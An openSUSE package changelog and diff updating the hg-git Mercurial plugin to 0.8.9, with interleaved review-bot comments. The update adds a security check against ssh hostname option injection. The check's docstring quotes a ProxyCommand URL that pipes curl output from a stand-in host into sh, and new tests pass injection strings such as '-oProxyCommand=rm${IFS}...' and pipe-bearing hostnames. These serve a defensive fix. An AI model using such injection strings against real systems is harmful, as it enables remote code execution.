Hello community, here is the log from the commit of package hg-git for openSUSE:Factory checked in at 2017-08-28 15:32:59 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Comparing /work/SRC/openSUSE:Factory/hg-git (Old) and /work/SRC/openSUSE:Factory/.hg-git.new (New) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Package is "hg-git" Mon Aug 28 15:32:59 2017 rev:22 rq:519049 version:0.8.9 Changes: -------- --- /work/SRC/openSUSE:Factory/hg-git/hg-git.changes 2017-05-03 15:58:16.786996137 +0200 +++ /work/SRC/openSUSE:Factory/.hg-git.new/hg-git.changes 2017-08-28 15:33:02.122887823 +0200 @@ -1,0 +2,7 @@ +Sat Aug 26 16:33:54 UTC 2017 - o...@aepfle.de + +- update to v0.8.9 + no changelog provided by upstream +- remove weird tests with hg-git.patch + +------------------------------------------------------------------- Old: ---- hg-git-0.8.6.tar.gz hg-git-0.8.6.tar.gz.asc New: ---- hg-git-0.8.9.tar.gz hg-git-0.8.9.tar.gz.asc hg-git.patch ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Other differences: ------------------ ++++++ hg-git.spec ++++++ --- /var/tmp/diff_new_pack.hsPsZ7/_old 2017-08-28 15:33:03.122747252 +0200 +++ /var/tmp/diff_new_pack.hsPsZ7/_new 2017-08-28 15:33:03.126746689 +0200 @@ -17,15 +17,16 @@ Name: hg-git -Version: 0.8.6 +Version: 0.8.9 Release: 0 Summary: Mercurial Plugin for Communicating with Git Servers License: GPL-2.0+ Group: Development/Tools/Version Control Url: https://hg-git.github.io -Source0: https://pypi.python.org/packages/c7/15/ec7e1bb6356cb140d5c1c2a2884fcadfd51c0039a6fccb08688c67646eba/hg-git-0.8.6.tar.gz -Source1: https://pypi.python.org/packages/c7/15/ec7e1bb6356cb140d5c1c2a2884fcadfd51c0039a6fccb08688c67646eba/hg-git-0.8.6.tar.gz.asc +Source0: https://pypi.python.org/packages/05/03/3ce3cfb6b2130d689ee8adf8ae20bf40925a81c60cc18edae191b405079e/hg-git-0.8.9.tar.gz +Source1: https://pypi.python.org/packages/05/03/3ce3cfb6b2130d689ee8adf8ae20bf40925a81c60cc18edae191b405079e/hg-git-0.8.9.tar.gz.asc Source2: %{name}.keyring +Patch0: hg-git.patch BuildRequires: git-daemon BuildRequires: mercurial BuildRequires: netcat-openbsd 
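Review bot: `Patch0: hg-git.patch` is added without the explanatory comment a spec file normally carries above a patch, and the changes entry only says "remove weird tests". The patch, shown later on this page, drops the test cases that pass hostnames containing `|` through the new ssh hostname check, so the reason they cannot run in the build should be recorded, for example `# PATCH-FIX-OPENSUSE hg-git.patch -- drop ssh tests that need a resolvable host at build time` (reason assumed, please confirm). The upstream diff also adds a hostname check whose docstring is marked "(SEC)" in `hggit/util.py`, and the changes entry would be more useful to anyone tracking security fixes if it said so rather than "no changelog provided by upstream".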
@@ -49,6 +50,7 @@ %prep %setup -q +%patch0 -p1 %build python setup.py build ++++++ hg-git-0.8.6.tar.gz -> hg-git-0.8.9.tar.gz ++++++ diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/PKG-INFO new/hg-git-0.8.9/PKG-INFO --- old/hg-git-0.8.6/PKG-INFO 2017-04-19 06:43:10.000000000 +0200 +++ new/hg-git-0.8.9/PKG-INFO 2017-08-10 21:39:38.000000000 +0200 @@ -1,6 +1,6 @@ Metadata-Version: 1.0 Name: hg-git -Version: 0.8.6 +Version: 0.8.9 Summary: push to and pull from a Git repository using Mercurial Home-page: http://hg-git.github.com/ Author: Augie Fackler diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hg_git.egg-info/PKG-INFO new/hg-git-0.8.9/hg_git.egg-info/PKG-INFO --- old/hg-git-0.8.6/hg_git.egg-info/PKG-INFO 2017-04-19 06:43:09.000000000 +0200 +++ new/hg-git-0.8.9/hg_git.egg-info/PKG-INFO 2017-08-10 21:39:38.000000000 +0200 @@ -1,6 +1,6 @@ Metadata-Version: 1.0 Name: hg-git -Version: 0.8.6 +Version: 0.8.9 Summary: push to and pull from a Git repository using Mercurial Home-page: http://hg-git.github.com/ Author: Augie Fackler diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/__init__.py new/hg-git-0.8.9/hggit/__init__.py --- old/hg-git-0.8.6/hggit/__init__.py 2017-04-19 06:41:08.000000000 +0200 +++ new/hg-git-0.8.9/hggit/__init__.py 2017-08-10 21:39:06.000000000 +0200 
@@ -77,14 +77,18 @@ 'collections', ]) -__version__ = '0.8.6' +__version__ = '0.8.9' testedwith = ('2.8.2 2.9.2 3.0.2 3.1.2 3.2.4 3.3.3 3.4.2 3.5.2 3.6.3 3.7.3' - '3.8.4 3.9.2 4.0.2 4.1.3 4.2-rc') + '3.8.4 3.9.2 4.0.2 4.1.3 4.2.3 4.3') buglink = 'https://bitbucket.org/durin42/hg-git/issues' cmdtable = {} -command = cmdutil.command(cmdtable) +try: + from mercurial import registrar + command = registrar.command(cmdtable) +except (ImportError, AttributeError): + command = cmdutil.command(cmdtable) # support for `hg clone git://github.com/defunkt/facebox.git` # also hg clone git+ssh://g...@github.com/schacon/simplegit.git @@ -210,7 +214,7 @@ if (getattr(dirstate, 'rootcache', False) and (not ignoremod or getattr(ignore, 'readpats', False)) and - hgutil.safehasattr(repo, 'join') and + hgutil.safehasattr(repo, 'vfs') and os.path.exists(repo.vfs.join('git'))): # only install our dirstate wrapper if it has a hope of working import gitdirstate @@ -266,8 +270,12 @@ gitsha, hgsha = line.strip().split(' ', 1) if hgsha in repo: new_map.append('%s %s\n' % (gitsha, hgsha)) - f = repo.vfs(GitHandler.map_file, 'wb') - map(f.write, new_map) + wlock = repo.wlock() + try: + f = repo.vfs(GitHandler.map_file, 'wb') + map(f.write, new_map) + finally: + wlock.release() ui.status(_('git commit map cleaned\n')) def findcommonoutgoing(orig, repo, other, *args, **kwargs): diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/compat.py new/hg-git-0.8.9/hggit/compat.py --- old/hg-git-0.8.6/hggit/compat.py 2017-03-12 00:49:00.000000000 +0100 +++ new/hg-git-0.8.9/hggit/compat.py 2017-08-10 20:28:43.000000000 +0200 
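Review bot: The two adjacent string literals in `testedwith` are joined with no separator, so as shown here the value contains `3.7.33.8.4` instead of two versions. The first literal should end with a space, `'... 3.6.3 3.7.3 '`. That line is unchanged context, but the second literal is edited by this hunk, so this is a cheap place to fix it. The new `try`/`except (ImportError, AttributeError)` around `registrar.command` would also benefit from a one-line comment saying that the fallback to `cmdutil.command` is for older Mercurial; the hunk does not state which version.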
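Review bot: The map file opened inside the new `wlock` block is never closed in this hunk, so `finally: wlock.release()` may run while the writes are still buffered, and the lock then does not cover the data reaching disk. Close the handle before the lock is released, and consider `atomictemp=True`, as `save_map` in `git_handler.py` already uses, so an interrupted write cannot leave a truncated map: `f = repo.vfs(GitHandler.map_file, 'wb', atomictemp=True)`, then `f.writelines(new_map)` and `f.close()`. `map(f.write, new_map)` is used only for its side effect and reads better as `writelines` or a plain loop. The enclosing function starts outside the hunk.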
@@ -28,11 +28,11 @@ s = s.replace(c, '') return s -def passwordmgr(ui, passwddb): +def passwordmgr(ui): try: - return url.passwordmgr(ui, - hgutil.urlreq.httppasswordmgrwithdefaultrealm()) - except TypeError: + realm = hgutil.urlreq.httppasswordmgrwithdefaultrealm() + return url.passwordmgr(ui, realm) + except (TypeError, AttributeError): # compat with hg < 3.9 return url.passwordmgr(ui) diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/git_handler.py new/hg-git-0.8.9/hggit/git_handler.py --- old/hg-git-0.8.6/hggit/git_handler.py 2017-04-19 05:21:45.000000000 +0200 +++ new/hg-git-0.8.9/hggit/git_handler.py 2017-08-10 20:28:43.000000000 +0200 @@ -106,7 +106,7 @@ self.ui = ui if ui.configbool('git', 'intree'): - self.gitdir = self.repo.wjoin('.git') + self.gitdir = self.repo.wvfs.join('.git') else: self.gitdir = self.repo.vfs.join('git') @@ -159,7 +159,7 @@ def init_author_file(self): self.author_map = {} if self.ui.config('git', 'authors'): - with open(self.repo.wjoin(self.ui.config('git', 'authors'))) as f: + with open(self.repo.wvfs.join(self.ui.config('git', 'authors'))) as f: for line in f: line = line.strip() if not line or line.startswith('#'): 
@@ -197,16 +197,20 @@ self._map_hg_real = map_hg_real def save_map(self, map_file): - file = self.repo.vfs(map_file, 'w+', atomictemp=True) - map_hg = self._map_hg - buf = cStringIO.StringIO() - bwrite = buf.write - for hgsha, gitsha in map_hg.iteritems(): - bwrite("%s %s\n" % (gitsha, hgsha)) - file.write(buf.getvalue()) - buf.close() - # If this complains, atomictempfile no longer has close - file.close() + wlock = self.repo.wlock() + try: + file = self.repo.vfs(map_file, 'w+', atomictemp=True) + map_hg = self._map_hg + buf = cStringIO.StringIO() + bwrite = buf.write + for hgsha, gitsha in map_hg.iteritems(): + bwrite("%s %s\n" % (gitsha, hgsha)) + file.write(buf.getvalue()) + buf.close() + # If this complains, atomictempfile no longer has close + file.close() + finally: + wlock.release() def load_tags(self): self.tags = {} @@ -299,8 +303,8 @@ # make sure the bookmark exists; at the point the remote # branches has already been set up suffix = self.branch_bookmark_suffix or '' - self.repo._bookmarks[rhead + suffix] = rnode - util.recordbookmarks(self.repo, self.repo._bookmarks) + changes = [(rhead + suffix, rnode)] + util.updatebookmarks(self.repo, changes) bms = [rhead + suffix] if bms: @@ -612,8 +616,11 @@ TESTS: + >>> from collections import namedtuple >>> from mercurial.ui import ui - >>> g = GitHandler('', ui()).get_valid_git_username_email + >>> mockrepo = namedtuple('localrepo', ['vfs']) + >>> mockrepo.vfs = '' + >>> g = GitHandler(mockrepo, ui()).get_valid_git_username_email >>> g('John Doe') 'John Doe' >>> g('j...@doe.com') @@ -981,6 +988,8 @@ # if named branch, add to extra if hg_branch: extra['branch'] = hg_branch + else: + extra['branch'] = 'default' # if committer is different than author, add it to extra if commit.author != commit.committer \ 
@@ -1369,6 +1378,7 @@ if ref.startswith('refs/heads/')]) suffix = self.branch_bookmark_suffix or '' + changes = [] for head, sha in heads.iteritems(): # refs contains all the refs in the server, not just # the ones we are pulling @@ -1378,15 +1388,15 @@ hgsha = bin(hgsha) if head not in bms: # new branch - bms[head + suffix] = hgsha + changes.append((head + suffix, hgsha)) else: bm = self.repo[bms[head]] if bm.ancestor(self.repo[hgsha]) == bm: # fast forward - bms[head + suffix] = hgsha + changes.append((head + suffix, hgsha)) if heads: - util.recordbookmarks(self.repo, bms) + util.updatebookmarks(self.repo, changes) except AttributeError: self.ui.warn(_('creating bookmarks failed, do you have' @@ -1635,9 +1645,12 @@ Tests: + >>> from collections import namedtuple >>> from dulwich.client import HttpGitClient, SSHGitClient >>> from mercurial.ui import ui - >>> g = GitHandler('', ui()) + >>> mockrepo = namedtuple('localrepo', ['vfs']) + >>> mockrepo.vfs = '' + >>> g = GitHandler(mockrepo, ui()) >>> client, url = g.get_transport_and_path('http://fqdn.com/test.git') >>> print isinstance(client, HttpGitClient) True @@ -1662,10 +1675,11 @@ git_match = RE_GIT_URI.match(uri) if git_match: res = git_match.groupdict() + host, port, sepr = res['host'], res['port'], res['sepr'] transport = client.TCPGitClient if 'ssh' in res['scheme']: + util.checksafessh(host) transport = client.SSHGitClient - host, port, sepr = res['host'], res['port'], res['sepr'] path = res['path'] if sepr == '/' and not path.startswith('~'): path = '/' + path 
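Review bot: The new `util.checksafessh(host)` guard covers only `host`, while `port` and `path` come from the same untrusted URI match and are used after it with no check in this hunk. As defined in the `hggit/util.py` hunk further down, the check rejects only a hostname that begins with `-` after one pass of URL-unquoting, and the added `.t` tests show hostnames containing `|` still being handed to ssh, so safety there depends on ssh being started without a shell. Validating the host against an allow-list of expected characters and requiring `port` to be numeric would make the guard independent of how the transport builds its command line; how dulwich passes these values is not visible on this page. The function body continues outside the hunk.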
@@ -1682,8 +1696,7 @@ uri = uri[4:] if uri.startswith('http://') or uri.startswith('https://'): - realm = hgutil.urlreq.httppasswordmgrwithdefaultrealm() - pmgr = compat.passwordmgr(self.ui, realm) + pmgr = compat.passwordmgr(self.ui) auth = urllib2.HTTPBasicAuthHandler(pmgr) opener = urllib2.build_opener(auth) diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/gitdirstate.py new/hg-git-0.8.9/hggit/gitdirstate.py --- old/hg-git-0.8.6/hggit/gitdirstate.py 2016-02-01 16:22:15.000000000 +0100 +++ new/hg-git-0.8.9/hggit/gitdirstate.py 2017-08-10 21:39:06.000000000 +0200 @@ -6,7 +6,6 @@ from mercurial import ( dirstate, match as matchmod, - osutil, scmutil, util, ) @@ -76,10 +75,10 @@ pats = [] if ignoremod: pats = ignore.readpats(root, files, warn) - for f, patlist in pats: - allpats.extend(patlist) else: - allpats.extend(['include:%s' % f for f in files]) + pats = [(f, ['include:%s' % f]) for f in files] + for f, patlist in pats: + allpats.extend(patlist) if extrapatterns: allpats.extend(extrapatterns) @@ -92,6 +91,10 @@ try: matchmod.match(root, '', [], patlist) except util.Abort, inst: + if not ignoremod: + # in this case, patlist is ['include: FILE'], and + # inst[0] should already include FILE + raise raise util.Abort('%s: %s' % (f, inst[0])) if extrapatterns: try: 
@@ -156,7 +159,12 @@ matchalways = match.always() matchtdir = match.traversedir dmap = self._map - listdir = osutil.listdir + # osutil moved in hg 4.3, but util re-exports listdir + try: + listdir = util.listdir + except AttributeError: + from mercurial import osutil + listdir = osutil.listdir lstat = os.lstat dirkind = stat.S_IFDIR regkind = stat.S_IFREG diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/overlay.py new/hg-git-0.8.9/hggit/overlay.py --- old/hg-git-0.8.6/hggit/overlay.py 2017-04-19 05:13:41.000000000 +0200 +++ new/hg-git-0.8.9/hggit/overlay.py 2017-08-05 23:52:04.000000000 +0200 @@ -198,6 +198,9 @@ blob = self.repo.handler.git.get_object(_maybehex(self.fileid)) return blob.data + def isbinary(self): + return util.binary(self.data()) + class overlaychangectx(context.changectx): def __init__(self, repo, sha): self.repo = repo diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/util.py new/hg-git-0.8.9/hggit/util.py --- old/hg-git-0.8.6/hggit/util.py 2016-02-01 16:22:15.000000000 +0100 +++ new/hg-git-0.8.9/hggit/util.py 2017-08-10 21:38:09.000000000 +0200 @@ -1,6 +1,7 @@ """Compatibility functions for old Mercurial versions and other utility functions.""" import re +import urllib try: from collections import OrderedDict @@ -8,7 +9,10 @@ from ordereddict import OrderedDict from dulwich import errors +from mercurial.i18n import _ from mercurial import ( + encoding, + error, lock as lockmod, util as hgutil, ) 
@@ -94,18 +98,43 @@ return True return False -def recordbookmarks(repo, bms, name='git_handler'): +def updatebookmarks(repo, changes, name='git_handler'): """abstract writing bookmarks for backwards compatibility""" + bms = repo._bookmarks tr = lock = wlock = None try: wlock = repo.wlock() lock = repo.lock() tr = repo.transaction(name) - if hgutil.safehasattr(bms, 'recordchange'): - # recordchange was added in mercurial 3.2 - bms.recordchange(tr) + if hgutil.safehasattr(bms, 'applychanges'): + # applychanges was added in mercurial 4.3 + bms.applychanges(repo, tr, changes) else: - bms.write() + for name, node in changes: + if node is None: + del bms[name] + else: + bms[name] = node + if hgutil.safehasattr(bms, 'recordchange'): + # recordchange was added in mercurial 3.2 + bms.recordchange(tr) + else: + bms.write() tr.close() finally: lockmod.release(tr, lock, wlock) + +def checksafessh(host): + """check if a hostname is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + host = urllib.unquote(host) + if host.startswith('-'): + raise error.Abort(_('potentially unsafe hostname: %r') % + (host,)) diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/setup.cfg new/hg-git-0.8.9/setup.cfg --- old/hg-git-0.8.6/setup.cfg 2017-04-19 06:43:10.000000000 +0200 +++ new/hg-git-0.8.9/setup.cfg 2017-08-10 21:39:38.000000000 +0200 
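Review bot: In the fallback branch of `updatebookmarks`, `for name, node in changes:` rebinds the `name` parameter that was passed to `repo.transaction(name)` a few lines earlier. It is harmless as written because the transaction is already open, but any later use of `name` would see a bookmark name instead of the transaction name; `for bmname, node in changes:` avoids that. The docstring could also state that `changes` is a list of `(bookmark, node)` pairs and that a `node` of `None` deletes the bookmark, which is what the loop implements.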
@@ -1,4 +1,5 @@ [egg_info] tag_build = tag_date = 0 +tag_svn_revision = 0 diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/commitextra.py new/hg-git-0.8.9/tests/commitextra.py --- old/hg-git-0.8.6/tests/commitextra.py 2014-12-19 20:24:06.000000000 +0100 +++ new/hg-git-0.8.9/tests/commitextra.py 2017-08-05 23:52:04.000000000 +0200 @@ -3,7 +3,11 @@ from mercurial import cmdutil, commands, scmutil cmdtable = {} -command = cmdutil.command(cmdtable) +try: + from mercurial import registrar + command = registrar.command(cmdtable) +except (ImportError, AttributeError): + command = cmdutil.command(cmdtable) testedwith = 'internal' @command('commitextra', diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-git-clone.t new/hg-git-0.8.9/tests/test-git-clone.t --- old/hg-git-0.8.6/tests/test-git-clone.t 2015-04-21 17:02:51.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-git-clone.t 2017-08-10 21:38:15.000000000 +0200 
@@ -36,3 +36,23 @@ * master 1:7fe02317c63d $ hg -R hgrepo gverify verifying rev 7fe02317c63d against git commit 9497a4ee62e16ee641860d7677cdb2589ea15554 + +test for ssh vulnerability + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = ssh -o ConnectTimeout=1 + > EOF + + $ hg clone 'git+ssh://-oProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg clone 'git+ssh://%2DoProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg clone 'git+ssh://fakehost|rm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. + $ hg clone 'git+ssh://fakehost%7Crm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-gitignore.t new/hg-git-0.8.9/tests/test-gitignore.t --- old/hg-git-0.8.6/tests/test-gitignore.t 2016-09-03 03:42:01.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-gitignore.t 2017-08-10 21:39:06.000000000 +0200 
@@ -142,3 +142,22 @@ ? dir/bar ? foo ? foobar + +show pattern error in hgignore file as expected (issue197) +---------------------------------------------------------- + + $ cat > $TESTTMP/invalidhgignore <<EOF + > # invalid syntax in regexp + > foo( + > EOF + $ hg status --config ui.ignore=$TESTTMP/invalidhgignore + abort: $TESTTMP/invalidhgignore: invalid pattern (relre): foo( + [255] + + $ cat > .hgignore <<EOF + > # invalid syntax in regexp + > foo( + > EOF + $ hg status + abort: $TESTTMP/.hgignore: invalid pattern (relre): foo( + [255] diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-http.t new/hg-git-0.8.9/tests/test-http.t --- old/hg-git-0.8.6/tests/test-http.t 2015-07-31 20:22:49.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-http.t 2017-08-05 23:52:04.000000000 +0200 @@ -19,11 +19,11 @@ #if windows $ hg serve -p $HGPORT1 2>&1 - abort: cannot start server at ':$HGPORT1': * (glob) + abort: cannot start server at '*:$HGPORT1': * (glob) [255] #else $ hg serve -p $HGPORT1 2>&1 - abort: cannot start server at ':$HGPORT1': Address already in use + abort: cannot start server at '*:$HGPORT1': Address already in use (glob) [255] #endif $ cd .. diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-pull.t new/hg-git-0.8.9/tests/test-pull.t --- old/hg-git-0.8.6/tests/test-pull.t 2015-10-21 16:48:11.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-pull.t 2017-08-10 21:38:18.000000000 +0200 
@@ -349,3 +349,25 @@ date: Mon Jan 01 00:00:12 2007 +0000 summary: add delta + +test for ssh vulnerability + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = ssh -o ConnectTimeout=1 + > EOF + + $ hg init a + $ cd a + $ hg pull 'git+ssh://-oProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg pull 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' + [255] + $ hg pull 'git+ssh://fakehost|shellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7cshellcommand port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. + $ hg pull 'git+ssh://fakehost%7Cshellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7cshellcommand port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-push.t new/hg-git-0.8.9/tests/test-push.t --- old/hg-git-0.8.6/tests/test-push.t 2017-03-12 00:49:38.000000000 +0100 +++ new/hg-git-0.8.9/tests/test-push.t 2017-08-10 21:38:27.000000000 +0200 
@@ -197,3 +197,22 @@ Only one bookmark 'master' should be created $ hg bookmarks * master 0:8aded40be5af + +test for ssh vulnerability + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = ssh -o ConnectTimeout=1 + > EOF + $ hg push 'git+ssh://-oProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg push 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' + [255] + $ hg push 'git+ssh://fakehost|rm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. + $ hg push 'git+ssh://fakehost%7Crm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. ++++++ hg-git.patch ++++++ --- a/tests/test-git-clone.t +++ b/tests/test-git-clone.t @@ -50,9 +50,3 @@ test for ssh vulnerability $ hg clone 'git+ssh://%2DoProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' [255] - $ hg clone 'git+ssh://fakehost|rm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. - $ hg clone 'git+ssh://fakehost%7Crm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. --- a/tests/test-pull.t +++ b/tests/test-pull.t 
@@ -365,9 +365,3 @@ test for ssh vulnerability $ hg pull 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' [255] - $ hg pull 'git+ssh://fakehost|shellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7cshellcommand port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. - $ hg pull 'git+ssh://fakehost%7Cshellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7cshellcommand port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. --- a/tests/test-push.t +++ b/tests/test-push.t @@ -210,9 +210,3 @@ test for ssh vulnerability $ hg push 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' [255] - $ hg push 'git+ssh://fakehost|rm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. - $ hg push 'git+ssh://fakehost%7Crm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. --- a/tests/test-renames.t +++ b/tests/test-renames.t @@ -46,7 +46,7 @@ Add a submodule (gitlink) and move it to $ sed -e 's/path = gitsubmodule/path = gitsubmodule2/' .gitmodules > .gitmodules-new $ mv .gitmodules-new .gitmodules $ mv gitsubmodule gitsubmodule2 - $ git add .gitmodules gitsubmodule2 + $ git add --no-warn-embedded-repo .gitmodules gitsubmodule2 $ git rm --cached gitsubmodule rm 'gitsubmodule' $ fn_git_commit -m 'move submodule'
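Review bot: `git add --no-warn-embedded-repo` is passed unconditionally in `tests/test-renames.t`, and a git that predates this option will reject it and fail the test. The `BuildRequires` lines visible in the spec hunk carry no minimum git version, so either add one or keep the plain `git add` and filter the warning from the expected output. The other three hunks of this patch only delete test cases, and the reason for dropping them is not recorded anywhere on the page.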